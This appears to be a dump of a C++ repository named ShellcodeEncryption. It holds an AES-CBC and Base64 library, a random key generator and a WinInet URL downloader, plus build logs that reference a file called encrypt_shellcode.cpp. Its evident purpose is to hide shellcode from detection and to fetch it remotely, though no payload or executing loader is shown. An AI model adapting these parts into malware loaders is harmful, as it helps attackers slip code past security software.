--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515201541815.png
--------------------------------------------------------------------------------
/README/image-20230516154122994.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516154122994.png
--------------------------------------------------------------------------------
/README/image-20230516154853419.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516154853419.png
--------------------------------------------------------------------------------
/README/image-20230516155107883.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516155107883.png
--------------------------------------------------------------------------------
/Shellcode加密库/AES.h:
--------------------------------------------------------------------------------
1 | #ifndef _AES_H
2 | #define _AES_H
3 | #include
4 | #include
5 | #include
6 | #define BLOCK_SIZE 16
7 | using namespace std;
8 |
9 | class AES
10 | {
11 | public:
12 | enum
13 | {
14 | ECB = 0, CBC = 1, CFB = 2
15 | };
16 |
17 | private:
18 | enum
19 | {
20 | DEFAULT_BLOCK_SIZE = 16
21 | };
22 | enum
23 | {
24 | MAX_BLOCK_SIZE = 32, MAX_ROUNDS = 14, MAX_KC = 8, MAX_BC = 8
25 | };
26 | public:
27 | AES();
28 | virtual ~AES();
29 | private:
30 | //Key Initialization Flag
31 | bool m_bKeyInit;
32 | //Encryption (m_Ke) round key
33 | int m_Ke[MAX_ROUNDS + 1][MAX_BC];
34 | //Decryption (m_Kd) round key
35 | int m_Kd[MAX_ROUNDS + 1][MAX_BC];
36 | //Key Length
37 | int m_keylength;
38 | //Block Size
39 | int m_blockSize;
40 | //Number of Rounds
41 | int m_iROUNDS;
42 | //Chain Block
43 | char m_chain0[MAX_BLOCK_SIZE];
44 | char m_chain[MAX_BLOCK_SIZE];
45 | //Auxiliary private use buffers
46 | int tk[MAX_KC];
47 | int a[MAX_BC];
48 | int t[MAX_BC];
49 | private:
50 | void Xor(char* buff, char const* chain);
51 | void DefEncryptBlock(char const* in, char* result);
52 | void DefDecryptBlock(char const* in, char* result);
53 | void EncryptBlock(char const* in, char* result);
54 | void DecryptBlock(char const* in, char* result);
55 | public:
56 | void MakeKey(char const* key, char const* chain, int keylength =
57 | DEFAULT_BLOCK_SIZE, int blockSize = DEFAULT_BLOCK_SIZE);
58 | void Encrypt(char const* in, char* result, size_t n, int iMode = ECB);
59 | void Decrypt(char const* in, char* result, size_t n, int iMode = ECB);
60 | };
61 |
62 | #endif // __RIJNDAEL_H__
--------------------------------------------------------------------------------
/Shellcode加密库/Base64.cpp:
--------------------------------------------------------------------------------
1 | #include "base64.h"
2 | #include
3 | #include
4 | static const std::string base64_chars =
5 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
6 | "abcdefghijklmnopqrstuvwxyz"
7 | "0123456789+/";
8 |
9 |
10 | static inline bool is_base64(unsigned char c) {
11 | return (isalnum(c) || (c == '+') || (c == '/'));
12 | }
13 |
14 | std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) {
15 | std::string ret;
16 | int i = 0;
17 | int j = 0;
18 | unsigned char char_array_3[3];
19 | unsigned char char_array_4[4];
20 |
21 | while (in_len--) {
22 | char_array_3[i++] = *(bytes_to_encode++);
23 | if (i == 3) {
24 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
25 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
26 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
27 | char_array_4[3] = char_array_3[2] & 0x3f;
28 |
29 | for (i = 0; (i < 4); i++)
30 | ret += base64_chars[char_array_4[i]];
31 | i = 0;
32 | }
33 | }
34 |
35 | if (i)
36 | {
37 | for (j = i; j < 3; j++)
38 | char_array_3[j] = '\0';
39 |
40 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
41 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
42 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
43 | char_array_4[3] = char_array_3[2] & 0x3f;
44 |
45 | for (j = 0; (j < i + 1); j++)
46 | ret += base64_chars[char_array_4[j]];
47 |
48 | while ((i++ < 3))
49 | ret += '=';
50 |
51 | }
52 |
53 | return ret;
54 |
55 | }
56 |
57 | std::string base64_decode(std::string const& encoded_string) {
58 | int in_len = encoded_string.size();
59 | int i = 0;
60 | int j = 0;
61 | int in_ = 0;
62 | unsigned char char_array_4[4], char_array_3[3];
63 | std::string ret;
64 |
65 | while (in_len-- && (encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
66 | char_array_4[i++] = encoded_string[in_]; in_++;
67 | if (i == 4) {
68 | for (i = 0; i < 4; i++)
69 | char_array_4[i] = base64_chars.find(char_array_4[i]);
70 |
71 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
72 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
73 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
74 |
75 | for (i = 0; (i < 3); i++)
76 | ret += char_array_3[i];
77 | i = 0;
78 | }
79 | }
80 |
81 | if (i) {
82 | for (j = i; j < 4; j++)
83 | char_array_4[j] = 0;
84 |
85 | for (j = 0; j < 4; j++)
86 | char_array_4[j] = base64_chars.find(char_array_4[j]);
87 |
88 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
89 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
90 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
91 |
92 | for (j = 0; (j < i - 1); j++) ret += char_array_3[j];
93 | }
94 |
95 | return ret;
96 | }
--------------------------------------------------------------------------------
/Shellcode加密库/Base64.h:
--------------------------------------------------------------------------------
1 | #ifndef BASE_64_H
2 | #define BASE_64_H
3 | #include
4 | std::string base64_encode(unsigned char const*, unsigned int len);
5 | std::string base64_decode(std::string const& s);
6 | #endif
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.cpp:
--------------------------------------------------------------------------------
1 | // Shellcode加密库.cpp : 定义静态库的函数。
2 | #include "Shellcode加密库.h"
3 | #define BUF_SIZE 4096
4 |
5 | using namespace std;
6 |
7 | string EncryptionAES(const string& strSrc, const char* g_key, const char* g_iv) {
8 | size_t length = strSrc.length();
9 | int block_num = length / BLOCK_SIZE + 1;
10 | //明文
11 | char* szDataIn = new char[block_num * BLOCK_SIZE + 1];
12 | memset(szDataIn, 0x00, block_num * BLOCK_SIZE + 1);
13 | strcpy(szDataIn, strSrc.c_str());
14 |
15 | //进行PKCS7Padding填充。
16 | int k = length % BLOCK_SIZE;
17 | int j = length / BLOCK_SIZE;
18 | int padding = BLOCK_SIZE - k;
19 | for (int i = 0; i < padding; i++)
20 | {
21 | szDataIn[j * BLOCK_SIZE + k + i] = padding;
22 | }
23 | szDataIn[block_num * BLOCK_SIZE] = '\0';
24 |
25 | //加密后的密文
26 | char* szDataOut = new char[block_num * BLOCK_SIZE + 1];
27 | memset(szDataOut, 0, block_num * BLOCK_SIZE + 1);
28 |
29 | //进行进行AES的CBC模式加密
30 | AES aes;
31 | aes.MakeKey(g_key, g_iv, 16, 16);
32 | aes.Encrypt(szDataIn, szDataOut, block_num * BLOCK_SIZE, AES::CBC);
33 | string str = base64_encode((unsigned char*)szDataOut,
34 | block_num * BLOCK_SIZE);
35 | delete[] szDataIn;
36 | delete[] szDataOut;
37 | return str;
38 | };
39 |
40 | string DecryptionAES(const string& strSrc, const char* g_key, const char* g_iv) {
41 | string strData = base64_decode(strSrc);
42 | size_t length = strData.length();
43 | //密文
44 | char* szDataIn = new char[length + 1];
45 | memcpy(szDataIn, strData.c_str(), length + 1);
46 | //明文
47 | char* szDataOut = new char[length + 1];
48 | memcpy(szDataOut, strData.c_str(), length + 1);
49 |
50 | //进行AES的CBC模式解密
51 | AES aes;
52 | aes.MakeKey(g_key, g_iv, 16, 16);
53 | aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
54 |
55 | //去PKCS7Padding填充
56 | if (0x00 < szDataOut[length - 1] <= 0x16)
57 | {
58 | int tmp = szDataOut[length - 1];
59 | for (int i = length - 1; i >= length - tmp; i--)
60 | {
61 | if (szDataOut[i] != tmp)
62 | {
63 | memset(szDataOut, 0, length);
64 | cout << "去填充失败!解密出错!!" << endl;
65 | break;
66 | }
67 | else
68 | szDataOut[i] = 0;
69 | }
70 | }
71 | string strDest(szDataOut);
72 | delete[] szDataIn;
73 | delete[] szDataOut;
74 | return strDest;
75 | }
76 |
77 | string random_string(size_t length)
78 | {
79 | auto randchar = []() -> char
80 | {
81 | const char charset[] =
82 | "0123456789"
83 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
84 | "abcdefghijklmnopqrstuvwxyz"
85 | "!@#$%^&*()_+=-[]{};:,.<>/?|";
86 | const size_t max_index = (sizeof(charset) - 1);
87 | return charset[rand() % max_index];
88 | };
89 | string str(length, 0);
90 | generate_n(str.begin(), length, randchar);
91 | return str;
92 | }
93 |
94 | string toHexString(unsigned char* data, size_t len)
95 | {
96 | ostringstream oss;
97 | for (size_t i = 0; i < len; ++i)
98 | oss << hex << setw(2) << setfill('0') << static_cast(data[i]);
99 | return oss.str();
100 | }
101 |
102 | LPSTR GetInterNetURLText(LPSTR lpcInterNetURL, unsigned char* buff)
103 | {
104 | HINTERNET hSession;
105 | LPSTR lpResult = NULL;
106 | // 这里把 "WinInet" 改成 _T("WinInet")
107 | hSession = InternetOpen(_T("WinInet"), INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
108 | __try
109 | {
110 | if (hSession != NULL)
111 | {
112 | HINTERNET hRequest;
113 | hRequest = InternetOpenUrlA(hSession, lpcInterNetURL, NULL, 0, INTERNET_FLAG_RELOAD, 0);
114 | __try
115 | {
116 | if (hRequest != NULL)
117 | {
118 | DWORD dwBytesRead;
119 | char szBuffer[BUF_SIZE] = { 0 };
120 |
121 | if (InternetReadFile(hRequest, szBuffer, BUF_SIZE, &dwBytesRead))
122 | {
123 | RtlMoveMemory(buff, szBuffer, BUF_SIZE);
124 | return 0;
125 | }
126 | }
127 | }
128 | __finally
129 | {
130 | InternetCloseHandle(hRequest);
131 | }
132 | }
133 | }
134 | __finally
135 | {
136 | InternetCloseHandle(hSession);
137 | }
138 | return lpResult;
139 | }
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/Shellcode加密库.h
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b4dc16ff-79c8-4c66-be29-8528b628b876}
25 | Shellcode加密库
26 | 10.0
27 |
28 |
29 |
30 | StaticLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | StaticLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | StaticLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | StaticLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
78 | true
79 | Use
80 | pch.h
81 |
82 |
83 |
84 |
85 | true
86 |
87 |
88 |
89 |
90 | Level3
91 | true
92 | true
93 | true
94 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
95 | true
96 | Use
97 | pch.h
98 |
99 |
100 |
101 |
102 | true
103 | true
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | false
111 | _DEBUG;_LIB;%(PreprocessorDefinitions)
112 | true
113 | NotUsing
114 | pch.h
115 | false
116 |
117 |
118 |
119 |
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | true
127 | true
128 | false
129 | NDEBUG;_LIB;%(PreprocessorDefinitions)
130 | true
131 | NotUsing
132 | pch.h
133 | false
134 |
135 |
136 |
137 |
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 | 源文件
26 |
27 |
28 |
29 |
30 | 头文件
31 |
32 |
33 | 头文件
34 |
35 |
36 | 头文件
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/AES.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Base64.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.pdb
2 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.idb
3 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.obj
4 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\base64.obj
5 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\aes.obj
6 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.lib
7 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib-link.read.1.tlog
11 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib-link.write.1.tlog
12 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib.command.1.tlog
13 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.lib.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.log:
--------------------------------------------------------------------------------
1 | AES.cpp
2 | Base64.cpp
3 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(58,36): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
4 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(69,57): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
5 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(86,56): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
6 | Shellcode加密库.cpp
7 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(9,41): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
8 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(17,29): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
9 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(13,2): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
10 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(56,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
11 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(59,3): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
12 | 正在生成代码...
13 | Shellcode加密库.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\Shellcode加密库.lib
14 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\Shellcode加密库.lib" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\Shellcode加密库.tlog\Shellcode加密库.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
15 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Shellcode加密库.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/AES.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Base64.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\x64\release\shellcode加密库.pdb
2 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.obj
3 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\base64.obj
4 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\aes.obj
5 | e:\source code\c_code\shellcode加密\x64\release\shellcode加密库.lib
6 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.command.1.tlog
7 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.read.1.tlog
8 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.write.1.tlog
9 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib-link.read.1.tlog
10 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib-link.write.1.tlog
11 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib.command.1.tlog
12 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.lib.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.log:
--------------------------------------------------------------------------------
1 | Shellcode加密库.cpp
2 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(9,41): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(13,2): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
4 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(17,29): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
5 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(56,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
6 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(59,3): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
7 | Shellcode加密库.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\Shellcode加密库.lib
8 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\Shellcode加密库.lib" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\Shellcode加密库.tlog\Shellcode加密库.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
9 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib-link.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Lib.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/Shellcode加密库.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Debug/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/Base64.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\debug\vc143.idb
2 | e:\source code\c_code\shellcode加密\aes加密\debug\vc143.pdb
3 | e:\source code\c_code\shellcode加密\aes加密\debug\aes加密.tlog\cl.command.1.tlog
4 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.ilk
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | encrypt_shellcode.cpp
